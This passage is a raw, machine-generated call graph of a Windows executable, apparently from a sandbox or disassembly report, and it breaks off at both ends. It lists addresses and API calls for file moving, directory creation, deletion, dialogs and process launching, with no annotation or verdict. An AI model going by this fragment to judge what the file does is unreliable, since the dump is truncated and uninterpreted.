API calls BuildCatchObjectHelperInternal 25941->26656 25942 7ff741ea3d34 51 API calls 25942->26006 26574 7ff741ebf4e0 25943->26574 25945 7ff741ebd5e9 GetDlgItem 25952 7ff741e92520 SetWindowTextW 25945->25952 25947 7ff741eadc2c 33 API calls 25947->26006 25949->25920 25956 7ff741ebe9a6 25950->25956 25951->25943 25957 7ff741ebd608 SendMessageW 25952->25957 25954->25949 25959 7ff741ebef36 25955->25959 26646 7ff741ead22c 25956->26646 25957->26008 25958 7ff741ea32bc 51 API calls 25958->26006 25964 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25959->25964 25962 7ff741ea5b60 53 API calls 25962->26006 25963 7ff741ebd63c SendMessageW 25963->26008 25969 7ff741ebef3c 25964->25969 25965 7ff741ebab54 34 API calls 25965->26006 25968 7ff741ea3f30 54 API calls 25968->26006 25971 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25969->25971 25970->25930 25970->25932 25973 7ff741ebef54 25970->25973 25974 7ff741ebef5a 25970->25974 25977 7ff741ebef42 25971->25977 25975 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25973->25975 25979 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25974->25979 25975->25974 25976 7ff741e98d04 33 API calls 25976->26006 25982 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25977->25982 25979->25941 25980 7ff741e94228 33 API calls 25980->26006 25981 7ff741e91fa0 31 API calls 25981->26006 25984 7ff741ebef48 25982->25984 25983 7ff741ea5820 33 API calls 25983->26006 25987 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25984->25987 25985 7ff741ea32a8 51 API calls 25985->26006 25986 7ff741ea5aa8 33 API calls 25986->26006 25988 7ff741ebef4e 25987->25988 25993 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 25988->25993 25989 7ff741e9250c SetDlgItemTextW 25989->26006 25992 7ff741e91150 33 API calls 25992->26006 25993->25973 25994 7ff741eb13c4 CompareStringW 26004 7ff741ebe9d1 25994->26004 25996 7ff741e91fa0 31 API calls 25996->26004 25997 7ff741e92034 33 API calls 25997->26006 25998 7ff741e9129c 33 API calls 25998->26004 26001 7ff741e9129c 33 API calls 26001->26006 26002 7ff741ebdf99 EndDialog 26002->26006 26004->25970 26004->25984 26004->25988 26004->25994 26004->25996 26004->25998 26005 7ff741ead22c 33 API calls 26004->26005 26005->26004 26006->25863 26006->25867 26006->25869 26006->25872 26006->25878 26006->25879 26006->25883 26006->25885 26006->25888 26006->25890 26006->25894 26006->25897 26006->25901 26006->25902 26006->25904 26006->25911 26006->25912 26006->25915 26006->25921 26006->25925 26006->25935 26006->25938 26006->25939 26006->25940 26006->25942 26006->25947 26006->25958 26006->25959 26006->25962 26006->25965 26006->25968 26006->25969 26006->25976 26006->25977 26006->25980 26006->25981 26006->25983 26006->25985 26006->25986 26006->25989 26006->25992 26006->25997 26006->26001 26006->26002 26007 7ff741ebdb21 MoveFileW 26006->26007 26006->26008 26011 7ff741ea2f58 56 API calls 26006->26011 26014 7ff741ebe600 SHChangeNotify 26006->26014 26501 7ff741eb13c4 CompareStringW 26006->26501 26502 7ff741eb87d8 26006->26502 26555 7ff741ea7df4 26006->26555 26563 7ff741ea5b08 26006->26563 26567 7ff741ea7eb0 26006->26567 26572 7ff741eb82c4 CoCreateInstance 26006->26572 26612 7ff741eacfa4 35 API calls _invalid_parameter_noinfo_noreturn 26006->26612 26613 7ff741eb95b4 33 API calls Concurrency::cancel_current_task 26006->26613 26614 7ff741ec0684 31 API calls _invalid_parameter_noinfo_noreturn 26006->26614 26616 7ff741eba834 33 API calls _invalid_parameter_noinfo_noreturn 26006->26616 26617 7ff741eb9518 33 API calls 26006->26617 26620 7ff741ebabe8 33 API calls 3 library calls 26006->26620 26621 7ff741ea7368 33 API calls 2 library calls 26006->26621 26622 7ff741ea4088 33 API calls 26006->26622 26623 7ff741ea65b0 33 API calls 3 library calls 26006->26623 26624 7ff741ea72cc 26006->26624 26628 7ff741e91744 33 API calls 4 library calls 26006->26628 26629 7ff741ea31bc 26006->26629 26643 7ff741ea3ea0 FindClose 26006->26643 26644 7ff741eb13f4 CompareStringW 26006->26644 26645 7ff741eb9cd0 47 API calls 26006->26645 26007->26008 26009 7ff741ebdb55 MoveFileExW 26007->26009 26008->25875 26008->25923 26008->25963 26008->26006 26010 7ff741e91fa0 31 API calls 26008->26010 26615 7ff741e9df4c 47 API calls BuildCatchObjectHelperInternal 26008->26615 26618 7ff741e92674 31 API calls _invalid_parameter_noinfo_noreturn 26008->26618 26619 7ff741eba440 116 API calls 2 library calls 26008->26619 26009->26008 26010->26008 26011->26006 26014->26006 26016 7ff741ebf9a3 26015->26016 26017 7ff741e920b0 33 API calls 26016->26017 26018 7ff741ebf9b9 26017->26018 26019 7ff741ebf9ee 26018->26019 26020 7ff741e920b0 33 API calls 26018->26020 26716 7ff741e9e34c 26019->26716 26020->26019 26022 7ff741ebfa4b 26736 7ff741e9e7a8 26022->26736 26026 7ff741ebfa61 26027 7ff741ec2320 _handle_error 8 API calls 26026->26027 26028 7ff741ebbc52 26027->26028 26028->25643 27847 7ff741eb849c 26030->27847 26033 7ff741ebf4b7 26035 7ff741ec2320 _handle_error 8 API calls 26033->26035 26034 7ff741ebf3c7 GetWindow 26042 7ff741ebf3e2 26034->26042 26036 7ff741ebbe9b 26035->26036 26036->25406 26036->25407 26037 7ff741ebf3ee GetClassNameW 27852 7ff741eb13c4 CompareStringW 26037->27852 26039 7ff741ebf496 GetWindow 26039->26033 26039->26042 26040 7ff741ebf417 GetWindowLongPtrW 26040->26039 26041 7ff741ebf429 SendMessageW 26040->26041 26041->26039 26043 7ff741ebf445 GetObjectW 26041->26043 26042->26033 26042->26037 26042->26039 26042->26040 27853 7ff741eb8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26043->27853 26045 7ff741ebf461 27854 7ff741eb84cc 26045->27854 27858 7ff741eb8df4 17 API calls _handle_error 26045->27858 26048 7ff741ebf479 SendMessageW DeleteObject 26048->26039 26050 7ff741ea6300 26049->26050 26056 7ff741ea638d 26049->26056 26051 7ff741e913a4 33 API calls 26050->26051 26052 7ff741ea631b GetCurrentDirectoryW 26051->26052 26053 7ff741ea6341 26052->26053 26054 7ff741e920b0 33 API calls 26053->26054 26055 7ff741ea634f 26054->26055 26055->26056 26057 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26055->26057 26056->25422 26058 7ff741ea63a9 26057->26058 26060 7ff741e92527 26059->26060 26061 7ff741e9252a SetWindowTextW 26059->26061 26060->26061 26062 7ff741efe2db 26061->26062 26063->25431 26065 7ff741e92513 26064->26065 26066 7ff741e92516 SetDlgItemTextW 26064->26066 26065->26066 26070 7ff741e912d0 26067->26070 26075 7ff741e9139b 26067->26075 26071 7ff741e91396 26070->26071 26072 7ff741e91338 26070->26072 26074 7ff741e912de BuildCatchObjectHelperInternal 26070->26074 27861 7ff741e91f80 33 API calls 3 library calls 26071->27861 26072->26074 26076 7ff741ec21d0 33 API calls 26072->26076 26074->25467 27862 7ff741e92004 33 API calls std::_Xinvalid_argument 26075->27862 26076->26074 26077->25492 26079 7ff741ea32bc 51 API calls 26078->26079 26080 7ff741ea32b1 26079->26080 26080->25504 26080->25530 26081->25504 26083 7ff741e913a4 33 API calls 26082->26083 26084 7ff741ea6489 26083->26084 26085 7ff741ea648c GetModuleFileNameW 26084->26085 26088 7ff741ea64dc 26084->26088 26086 7ff741ea64a7 26085->26086 26087 7ff741ea64de 26085->26087 26086->26084 26087->26088 26089 7ff741e9129c 33 API calls 26088->26089 26091 7ff741ea6506 26089->26091 26090 7ff741ea653e 26090->25568 26091->26090 26092 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26091->26092 26093 7ff741ea6560 26092->26093 26094->25584 26096 7ff741e920f6 26095->26096 26098 7ff741e920cb BuildCatchObjectHelperInternal 26095->26098 27863 7ff741e91474 33 API calls 3 library calls 26096->27863 26098->25607 26100 7ff741ebabaf 26099->26100 26101 7ff741e920b0 33 API calls 26100->26101 26102 7ff741ebabbd 26101->26102 26103 7ff741ec2320 _handle_error 8 API calls 26102->26103 26104 7ff741ebabd2 26103->26104 26104->25626 26105->25645 26106->25654 26108 7ff741ec3620 26107->26108 26108->25658 26109->25571 26111 7ff741e91177 26110->26111 26112 7ff741e92034 33 API calls 26111->26112 26113 7ff741e91185 BuildCatchObjectHelperInternal 26112->26113 26113->25587 26115 7ff741e92085 26114->26115 26116 7ff741e92059 BuildCatchObjectHelperInternal 26114->26116 27864 7ff741e915b8 33 API calls 3 library calls 26115->27864 26116->25558 26119 7ff741ec2329 26118->26119 26120 7ff741ebc350 26119->26120 26121 7ff741ec2550 IsProcessorFeaturePresent 26119->26121 26122 7ff741ec2568 26121->26122 27865 7ff741ec2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26122->27865 26124 7ff741ec257b 27866 7ff741ec2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26124->27866 27867 7ff741ec783c 31 API calls 3 library calls 26127->27867 26129 7ff741ec791d 27868 7ff741ec7934 16 API calls abort 26129->27868 26132->25612 26133->25677 26134->25702 26135->25717 26136->25729 26162 7ff741ea3e28 26137->26162 26141 7ff741eaa589 26168 7ff741ea9408 26141->26168 26144 7ff741eaa6f2 GetSystemMetrics GetWindow 26146 7ff741eaa821 26144->26146 26161 7ff741eaa71d 26144->26161 26145 7ff741eaa603 26147 7ff741eaa6c2 26145->26147 26148 7ff741eaa60c GetWindowLongPtrW 26145->26148 26151 7ff741ec2320 _handle_error 8 API calls 26146->26151 26187 7ff741ea95a8 26147->26187 26152 7ff741efe2c0 26148->26152 26150 7ff741eaa519 26150->26141 26159 7ff741eaa56a SetDlgItemTextW 26150->26159 26183 7ff741ea9800 26150->26183 26155 7ff741eaa830 26151->26155 26156 7ff741eaa6aa GetWindowRect 26152->26156 26155->25742 26156->26147 26157 7ff741eaa6e5 SetWindowTextW 26157->26144 26158 7ff741eaa73e GetWindowRect 26158->26161 26159->26150 26160 7ff741eaa800 GetWindow 26160->26146 26160->26161 26161->26146 26161->26158 26161->26160 26163 7ff741ea3e4d swprintf 26162->26163 26196 7ff741ec9ef0 26163->26196 26166 7ff741eb0f68 WideCharToMultiByte 26167 7ff741eb0faa 26166->26167 26167->26150 26169 7ff741ea95a8 47 API calls 26168->26169 26172 7ff741ea944f 26169->26172 26170 7ff741ea955a 26171 7ff741ec2320 _handle_error 8 API calls 26170->26171 26173 7ff741ea958e GetWindowRect GetClientRect 26171->26173 26172->26170 26174 7ff741e9129c 33 API calls 26172->26174 26173->26144 26173->26145 26176 7ff741ea949c 26174->26176 26175 7ff741ea95a1 26177 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26175->26177 26176->26175 26178 7ff741e9129c 33 API calls 26176->26178 26179 7ff741ea95a7 26177->26179 26180 7ff741ea9514 26178->26180 26180->26170 26181 7ff741ea959c 26180->26181 26182 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26181->26182 26182->26175 26184 7ff741ea9840 26183->26184 26186 7ff741ea9869 26183->26186 26235 7ff741eca270 31 API calls 2 library calls 26184->26235 26186->26150 26188 7ff741ea3e28 swprintf 46 API calls 26187->26188 26189 7ff741ea95eb 26188->26189 26190 7ff741eb0f68 WideCharToMultiByte 26189->26190 26191 7ff741ea9603 26190->26191 26192 7ff741ea9800 31 API calls 26191->26192 26193 7ff741ea961b 26192->26193 26194 7ff741ec2320 _handle_error 8 API calls 26193->26194 26195 7ff741ea962b 26194->26195 26195->26144 26195->26157 26197 7ff741ec9f36 26196->26197 26198 7ff741ec9f4e 26196->26198 26223 7ff741ecd69c 15 API calls abort 26197->26223 26198->26197 26200 7ff741ec9f58 26198->26200 26225 7ff741ec7ef0 35 API calls 2 library calls 26200->26225 26201 7ff741ec9f3b 26224 7ff741ec78e4 31 API calls _invalid_parameter_noinfo 26201->26224 26204 7ff741ec2320 _handle_error 8 API calls 26206 7ff741ea3e69 26204->26206 26205 7ff741ec9f69 __scrt_get_show_window_mode 26226 7ff741ec7e70 15 API calls _set_fmode 26205->26226 26206->26166 26208 7ff741ec9fd4 26227 7ff741ec82f8 46 API calls 3 library calls 26208->26227 26210 7ff741ec9fdd 26211 7ff741ec9fe5 26210->26211 26214 7ff741eca014 26210->26214 26228 7ff741ecd90c 26211->26228 26213 7ff741eca06c 26218 7ff741ecd90c __free_lconv_mon 15 API calls 26213->26218 26214->26213 26215 7ff741eca023 26214->26215 26216 7ff741eca092 26214->26216 26217 7ff741eca01a 26214->26217 26220 7ff741ecd90c __free_lconv_mon 15 API calls 26215->26220 26216->26213 26219 7ff741eca09c 26216->26219 26217->26213 26217->26215 26222 7ff741ec9f46 26218->26222 26221 7ff741ecd90c __free_lconv_mon 15 API calls 26219->26221 26220->26222 26221->26222 26222->26204 26223->26201 26224->26222 26225->26205 26226->26208 26227->26210 26229 7ff741ecd911 RtlFreeHeap 26228->26229 26233 7ff741ecd941 __free_lconv_mon 26228->26233 26230 7ff741ecd92c 26229->26230 26229->26233 26234 7ff741ecd69c 15 API calls abort 26230->26234 26232 7ff741ecd931 GetLastError 26232->26233 26233->26222 26234->26232 26235->26186 26248 7ff741e913a4 26236->26248 26239 7ff741e92494 26240 7ff741e9129c 33 API calls 26239->26240 26241 7ff741e924a2 26240->26241 26242 7ff741e924dd 26241->26242 26244 7ff741e92505 26241->26244 26243 7ff741ec2320 _handle_error 8 API calls 26242->26243 26245 7ff741e924f3 26243->26245 26246 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26244->26246 26245->25751 26247 7ff741e9250a 26246->26247 26249 7ff741e9142d GetWindowTextW 26248->26249 26250 7ff741e913ad 26248->26250 26249->26239 26251 7ff741e9143d 26250->26251 26252 7ff741e913ce 26250->26252 26268 7ff741e92018 33 API calls std::_Xinvalid_argument 26251->26268 26255 7ff741e913db __scrt_get_show_window_mode 26252->26255 26258 7ff741ec21d0 26252->26258 26267 7ff741e9197c 31 API calls _invalid_parameter_noinfo_noreturn 26255->26267 26259 7ff741ec21db 26258->26259 26260 7ff741ec21f4 26259->26260 26262 7ff741ec21fa 26259->26262 26269 7ff741ecbbc0 26259->26269 26260->26255 26263 7ff741ec2205 26262->26263 26272 7ff741ec2f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26262->26272 26273 7ff741e91f80 33 API calls 3 library calls 26263->26273 26266 7ff741ec220b 26267->26249 26274 7ff741ecbc00 26269->26274 26272->26263 26273->26266 26279 7ff741ecf398 EnterCriticalSection 26274->26279 26280->25768 26282->25776 26290 7ff741ea9638 26283->26290 26286 7ff741ea97d9 26288 7ff741ec2320 _handle_error 8 API calls 26286->26288 26287 7ff741ea9800 31 API calls 26287->26286 26289 7ff741ea97f2 26288->26289 26289->25788 26289->25789 26291 7ff741ea9692 26290->26291 26299 7ff741ea9730 26290->26299 26292 7ff741eb0f68 WideCharToMultiByte 26291->26292 26295 7ff741ea96c0 26291->26295 26292->26295 26293 7ff741ec2320 _handle_error 8 API calls 26294 7ff741ea9764 26293->26294 26294->26286 26294->26287 26298 7ff741ea96ef 26295->26298 26300 7ff741eaaa88 45 API calls 2 library calls 26295->26300 26301 7ff741eca270 31 API calls 2 library calls 26298->26301 26299->26293 26300->26298 26301->26299 26318 7ff741ead4d0 26302->26318 26306 7ff741ec9ef0 swprintf 46 API calls 26307 7ff741ead8e5 swprintf 26306->26307 26307->26306 26315 7ff741ead974 26307->26315 26332 7ff741e99d78 33 API calls 26307->26332 26309 7ff741eada17 26310 7ff741ec2320 _handle_error 8 API calls 26309->26310 26312 7ff741eada2b 26310->26312 26311 7ff741eada3f 26313 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26311->26313 26312->25794 26314 7ff741eada44 26313->26314 26316 7ff741ead9a3 26315->26316 26333 7ff741e99d78 33 API calls 26315->26333 26316->26309 26316->26311 26319 7ff741ead665 26318->26319 26321 7ff741ead502 26318->26321 26322 7ff741eacb80 26319->26322 26320 7ff741e91744 33 API calls 26320->26321 26321->26319 26321->26320 26323 7ff741eacbb6 26322->26323 26330 7ff741eacc80 26322->26330 26326 7ff741eacc20 26323->26326 26327 7ff741eacc7b 26323->26327 26329 7ff741eacbc6 26323->26329 26326->26329 26331 7ff741ec21d0 33 API calls 26326->26331 26334 7ff741e91f80 33 API calls 3 library calls 26327->26334 26329->26307 26335 7ff741e92004 33 API calls std::_Xinvalid_argument 26330->26335 26331->26329 26332->26307 26333->26316 26334->26330 26337 7ff741ebae80 GetDlgItem 26336->26337 26338 7ff741ebae3c GetMessageW 26336->26338 26337->25797 26337->25798 26339 7ff741ebae6a TranslateMessage DispatchMessageW 26338->26339 26340 7ff741ebae5b IsDialogMessageW 26338->26340 26339->26337 26340->26337 26340->26339 26343 7ff741ea36b3 26341->26343 26342 7ff741ea36e0 26361 7ff741ea32bc 26342->26361 26343->26342 26345 7ff741ea36cc CreateDirectoryW 26343->26345 26345->26342 26347 7ff741ea377d 26345->26347 26349 7ff741ea378d 26347->26349 26448 7ff741ea3d34 26347->26448 26348 7ff741ea3791 GetLastError 26348->26349 26352 7ff741ec2320 _handle_error 8 API calls 26349->26352 26354 7ff741ea37b9 26352->26354 26354->25813 26355 7ff741ea3720 CreateDirectoryW 26356 7ff741ea373b 26355->26356 26357 7ff741ea3774 26356->26357 26358 7ff741ea37ce 26356->26358 26357->26347 26357->26348 26359 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26358->26359 26360 7ff741ea37d3 26359->26360 26362 7ff741ea32e4 26361->26362 26363 7ff741ea32e7 GetFileAttributesW 26361->26363 26362->26363 26364 7ff741ea32f8 26363->26364 26371 7ff741ea3375 26363->26371 26365 7ff741ea6a0c 49 API calls 26364->26365 26367 7ff741ea331f 26365->26367 26366 7ff741ec2320 _handle_error 8 API calls 26368 7ff741ea3389 26366->26368 26369 7ff741ea3323 GetFileAttributesW 26367->26369 26370 7ff741ea333c 26367->26370 26368->26348 26375 7ff741ea6a0c 26368->26375 26369->26370 26370->26371 26372 7ff741ea3399 26370->26372 26371->26366 26373 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26372->26373 26374 7ff741ea339e 26373->26374 26376 7ff741ea6a44 26375->26376 26377 7ff741ea6a4b 26375->26377 26378 7ff741ec2320 _handle_error 8 API calls 26376->26378 26379 7ff741e9129c 33 API calls 26377->26379 26380 7ff741ea371c 26378->26380 26381 7ff741ea6a76 26379->26381 26380->26355 26380->26356 26382 7ff741ea6a96 26381->26382 26383 7ff741ea6cc7 26381->26383 26385 7ff741ea6ab0 26382->26385 26390 7ff741ea6b49 26382->26390 26384 7ff741ea62dc 35 API calls 26383->26384 26388 7ff741ea6ce6 26384->26388 26414 7ff741ea70ab 26385->26414 26462 7ff741e9c098 33 API calls 2 library calls 26385->26462 26387 7ff741ea6eef 26430 7ff741ea70cf 26387->26430 26467 7ff741e9c098 33 API calls 2 library calls 26387->26467 26388->26387 26392 7ff741ea6d1b 26388->26392 26393 7ff741ea6b44 26388->26393 26389 7ff741ea70b1 26397 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26389->26397 26390->26393 26411 7ff741e9129c 33 API calls 26390->26411 26421 7ff741ea70bd 26392->26421 26465 7ff741e9c098 33 API calls 2 library calls 26392->26465 26393->26376 26393->26389 26394 7ff741ea70d5 26393->26394 26400 7ff741ea70a6 26393->26400 26398 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26394->26398 26404 7ff741ea70b7 26397->26404 26405 7ff741ea70db 26398->26405 26399 7ff741ea6b03 26406 7ff741e91fa0 31 API calls 26399->26406 26412 7ff741ea6b15 BuildCatchObjectHelperInternal 26399->26412 26410 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26400->26410 26401 7ff741ea6f56 26468 7ff741e911cc 33 API calls BuildCatchObjectHelperInternal 26401->26468 26415 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26404->26415 26417 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26405->26417 26406->26412 26408 7ff741ea70c3 26420 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26408->26420 26409 7ff741e91fa0 31 API calls 26409->26393 26410->26414 26418 7ff741ea6bbe 26411->26418 26412->26409 26413 7ff741ea6f69 26469 7ff741ea57ac 33 API calls BuildCatchObjectHelperInternal 26413->26469 26470 7ff741e92004 33 API calls std::_Xinvalid_argument 26414->26470 26415->26421 26416 7ff741e91fa0 31 API calls 26432 7ff741ea6df5 26416->26432 26422 7ff741ea70e1 26417->26422 26463 7ff741ea5820 33 API calls 26418->26463 26424 7ff741ea70c9 26420->26424 26471 7ff741e92004 33 API calls std::_Xinvalid_argument 26421->26471 26472 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26424->26472 26425 7ff741ea6d76 BuildCatchObjectHelperInternal 26425->26408 26425->26416 26426 7ff741ea6bd3 26464 7ff741e9e164 33 API calls 2 library calls 26426->26464 26427 7ff741e91fa0 31 API calls 26431 7ff741ea6fec 26427->26431 26473 7ff741e92004 33 API calls std::_Xinvalid_argument 26430->26473 26433 7ff741e91fa0 31 API calls 26431->26433 26438 7ff741ea6e21 26432->26438 26466 7ff741e91744 33 API calls 4 library calls 26432->26466 26437 7ff741ea6ff6 26433->26437 26434 7ff741ea6f79 BuildCatchObjectHelperInternal 26434->26405 26434->26427 26436 7ff741e91fa0 31 API calls 26440 7ff741ea6c6d 26436->26440 26441 7ff741e91fa0 31 API calls 26437->26441 26438->26424 26442 7ff741e9129c 33 API calls 26438->26442 26439 7ff741ea6be9 BuildCatchObjectHelperInternal 26439->26404 26439->26436 26443 7ff741e91fa0 31 API calls 26440->26443 26441->26393 26444 7ff741ea6ec2 26442->26444 26443->26393 26445 7ff741e92034 33 API calls 26444->26445 26446 7ff741ea6edf 26445->26446 26447 7ff741e91fa0 31 API calls 26446->26447 26447->26393 26449 7ff741ea3d5b 26448->26449 26450 7ff741ea3d5e SetFileAttributesW 26448->26450 26449->26450 26451 7ff741ea3d74 26450->26451 26458 7ff741ea3df5 26450->26458 26453 7ff741ea6a0c 49 API calls 26451->26453 26452 7ff741ec2320 _handle_error 8 API calls 26454 7ff741ea3e0a 26452->26454 26455 7ff741ea3d99 26453->26455 26454->26349 26456 7ff741ea3d9d SetFileAttributesW 26455->26456 26457 7ff741ea3dbc 26455->26457 26456->26457 26457->26458 26459 7ff741ea3e1a 26457->26459 26458->26452 26460 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26459->26460 26461 7ff741ea3e1f 26460->26461 26462->26399 26463->26426 26464->26439 26465->26425 26466->26438 26467->26401 26468->26413 26469->26434 26472->26430 26475 7ff741e97206 26474->26475 26477 7ff741e9713b 26474->26477 26484 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26475->26484 26482 7ff741e9714b BuildCatchObjectHelperInternal 26477->26482 26483 7ff741e93f48 33 API calls 2 library calls 26477->26483 26479 7ff741e97273 26479->25832 26480 7ff741e9720b 26480->26479 26485 7ff741e9889c 8 API calls BuildCatchObjectHelperInternal 26480->26485 26482->25832 26483->26482 26484->26480 26485->26480 26487 7ff741ea22ef 26486->26487 26488 7ff741ea2303 26486->26488 26487->26488 26489 7ff741ea20d0 100 API calls 26487->26489 26488->25856 26489->26488 26491 7ff741ea20ea 26490->26491 26492 7ff741ea2102 26490->26492 26491->26492 26494 7ff741ea20f6 CloseHandle 26491->26494 26493 7ff741ea2126 26492->26493 26496 7ff741e9b544 99 API calls 26492->26496 26493->25856 26494->26492 26496->26493 26498 7ff741ebaa2f 26497->26498 26499 7ff741ebaa36 26497->26499 26498->26006 26499->26498 26661 7ff741e91744 33 API calls 4 library calls 26499->26661 26501->26006 26503 7ff741eb8810 26502->26503 26504 7ff741eb8a2f 26503->26504 26509 7ff741eb881d 26503->26509 26505 7ff741ea32a8 51 API calls 26504->26505 26508 7ff741eb8a34 26505->26508 26506 7ff741ec2320 _handle_error 8 API calls 26507 7ff741eb8d9e 26506->26507 26507->26006 26513 7ff741e9129c 33 API calls 26508->26513 26516 7ff741eb8b23 26508->26516 26517 7ff741ea32a8 51 API calls 26508->26517 26525 7ff741ea32bc 51 API calls 26508->26525 26532 7ff741eb8dd9 26508->26532 26549 7ff741eb8856 26508->26549 26510 7ff741eb8890 26509->26510 26509->26549 26554 7ff741eb8dbb 26509->26554 26514 7ff741e9129c 33 API calls 26510->26514 26512 7ff741eb8dc1 26515 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26512->26515 26513->26508 26520 7ff741eb88b4 BuildCatchObjectHelperInternal 26514->26520 26518 7ff741eb8dc7 26515->26518 26522 7ff741eb8b48 26516->26522 26541 7ff741eb8bf7 26516->26541 26516->26549 26517->26508 26663 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26518->26663 26519 7ff741eb896c 26519->26518 26521 7ff741eb898b 26519->26521 26520->26512 26520->26519 26527 7ff741e9129c 33 API calls 26521->26527 26523 7ff741eb8dd3 26522->26523 26524 7ff741eb8b5d 26522->26524 26664 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26523->26664 26531 7ff741e9129c 33 API calls 26524->26531 26525->26508 26530 7ff741eb89b8 26527->26530 26528 7ff741eb8dcd 26535 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26528->26535 26537 7ff741e91fa0 31 API calls 26530->26537 26539 7ff741eb89c9 BuildCatchObjectHelperInternal 26530->26539 26534 7ff741eb8b84 26531->26534 26533 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26532->26533 26536 7ff741eb8ddf 26533->26536 26542 7ff741e91fa0 31 API calls 26534->26542 26545 7ff741eb8b95 BuildCatchObjectHelperInternal 26534->26545 26535->26523 26544 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26536->26544 26537->26539 26538 7ff741eb8de5 26665 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26538->26665 26539->26528 26539->26549 26543 7ff741eb8deb 26541->26543 26547 7ff741e9129c 33 API calls 26541->26547 26550 7ff741eb8bed 26541->26550 26542->26545 26666 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26543->26666 26544->26538 26545->26536 26545->26550 26552 7ff741eb8ca2 BuildCatchObjectHelperInternal 26547->26552 26548 7ff741eb8df1 26549->26506 26550->26538 26550->26549 26551 7ff741eb8db6 26553 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26551->26553 26552->26550 26552->26551 26553->26554 26662 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26554->26662 26556 7ff741ea7e0c 26555->26556 26557 7ff741ea7e23 26556->26557 26558 7ff741ea7e55 26556->26558 26560 7ff741e9129c 33 API calls 26557->26560 26667 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26558->26667 26562 7ff741ea7e47 26560->26562 26561 7ff741ea7e5a 26562->26006 26565 7ff741ea5b1d 26563->26565 26564 7ff741ea5b23 26564->26006 26565->26564 26668 7ff741eb13c4 CompareStringW 26565->26668 26568 7ff741ea7ebe 26567->26568 26569 7ff741ea7ee7 26568->26569 26669 7ff741e9704c 47 API calls BuildCatchObjectHelperInternal 26568->26669 26569->26006 26571 7ff741ea7f06 26573 7ff741eb831e 26572->26573 26573->26006 26579 7ff741ebf529 __scrt_get_show_window_mode 26574->26579 26591 7ff741ebf87d 26574->26591 26575 7ff741e91fa0 31 API calls 26576 7ff741ebf89c 26575->26576 26577 7ff741ec2320 _handle_error 8 API calls 26576->26577 26578 7ff741ebf8a8 26577->26578 26578->25949 26580 7ff741ebf684 26579->26580 26670 7ff741eb13c4 CompareStringW 26579->26670 26582 7ff741e9129c 33 API calls 26580->26582 26583 7ff741ebf6c0 26582->26583 26584 7ff741ea32a8 51 API calls 26583->26584 26585 7ff741ebf6ca 26584->26585 26586 7ff741e91fa0 31 API calls 26585->26586 26589 7ff741ebf6d5 26586->26589 26587 7ff741ebf742 ShellExecuteExW 26588 7ff741ebf846 26587->26588 26596 7ff741ebf755 26587->26596 26588->26591 26594 7ff741ebf8fb 26588->26594 26589->26587 26590 7ff741e9129c 33 API calls 26589->26590 26593 7ff741ebf717 26590->26593 26591->26575 26592 7ff741ebf78e 26710 7ff741ebfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26592->26710 26671 7ff741ea5b60 26593->26671 26598 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 26594->26598 26595 7ff741ebf7e3 CloseHandle 26599 7ff741ebf7f2 26595->26599 26606 7ff741ebf801 26595->26606 26596->26592 26596->26595 26604 7ff741ebf781 ShowWindow 26596->26604 26602 7ff741ebf900 26598->26602 26711 7ff741eb13c4 CompareStringW 26599->26711 26604->26592 26605 7ff741e91fa0 31 API calls 26609 7ff741ebf72f 26605->26609 26606->26588 26607 7ff741ebf837 ShowWindow 26606->26607 26607->26588 26608 7ff741ebf7a6 26608->26595 26610 7ff741ebf7b4 GetExitCodeProcess 26608->26610 26609->26587 26610->26595 26611 7ff741ebf7c7 26610->26611 26611->26595 26612->26006 26613->26006 26614->26006 26615->26008 26616->26006 26617->26006 26619->25945 26620->26006 26621->26006 26622->26006 26623->26006 26625 7ff741ea72ea 26624->26625 26712 7ff741e9b3a8 26625->26712 26628->26006 26630 7ff741ea31e4 26629->26630 26631 7ff741ea31e7 DeleteFileW 26629->26631 26630->26631 26632 7ff741ea31fd 26631->26632 26639 7ff741ea327c 26631->26639 26634 7ff741ea6a0c 49 API 